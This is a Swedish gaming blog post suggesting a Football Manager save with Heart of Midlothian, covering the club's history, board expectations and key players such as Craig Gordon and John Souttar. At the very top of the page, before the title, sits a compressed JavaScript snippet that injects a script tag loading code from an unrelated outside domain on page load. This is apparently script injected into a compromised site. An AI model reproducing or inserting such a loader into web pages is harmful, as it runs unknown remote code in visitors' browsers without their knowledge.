;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veckans inspiration: Hearts – FMSweden
Meny Stäng

Veckans inspiration: Hearts

Denna går jag utanför topp 5-ligorna och Norden, för att istället landa i Skottland. Klubben är närmare bestämt klassiska Heart of Midlothian FC som är huvudstaden Edinburghs äldsta klubb, grundad redan 1874. Hearts, som de kallas i folkmun, har länge spelat i högstaligan Premier League men har under det senaste decenniet åkt ut därifrån två gånger. För tillfället spelar de faktiskt i Championship, men de är tippade etta så kraven är en direkt comeback till högstaligan. Historiskt hade de sin mest framgångsrika period under 1950-talet med managern Tommy Walker vid rodret, faktum är att de ej vunnit PL sedan dess. Cupen vann de senast 2012 och de blev även tvåa där i fjol. För en detaljerad historik kring klubben, läs Wikipedia-sidan (länk).

På FM begär som sagt styrelsen uppflyttning första säsongen, men det finns alla förutsättningar för att lyckas med det. Klubben spelar på hemmarenan Tynecastle Park med en kapacitet på cirka 20 000 åskådare. Träningsfaciliteterna är utmärkta och ungdomsanläggningen fantastisk, vilket är i klass med de största klubbarna i landet och betydligt bättre än konkurrenternas i andraligan. Vidare önskar styrelsen att du värvar spelare under 22 år och utvecklar egna talanger från akademin. Dessutom begär de minst kvartsfinal i bägge inhemska cuperna, men helst att du vinner minst en av dem.

Truppen då? Målvakten Craig Gordon ligger mig varmt om hjärtat, då han var med på en BRG-save med Sunderland på FM11. Nu är han 37 år gammal, vilket innebär att han sjunger på sista versen. Bland utespelarna märks främst den 23-årige mittbacken John Souttar med en finfin potential. Framåt framstår den 29-årige forwarden Liam Boyce som det bästa alternativet och däremellan ser Peter Haring ut att kunna spela en viktig roll på det centrala mittfältet. Utmaningen ligger främst i att återetablera Hearts i högstaligan och på sikt passera Celtic och Rangers. Lycka till om du tar dig an denna save!

 

Heart of Midlothian FC logo.svg

Please wait...

Liknande Inlägg

Lämna ett svar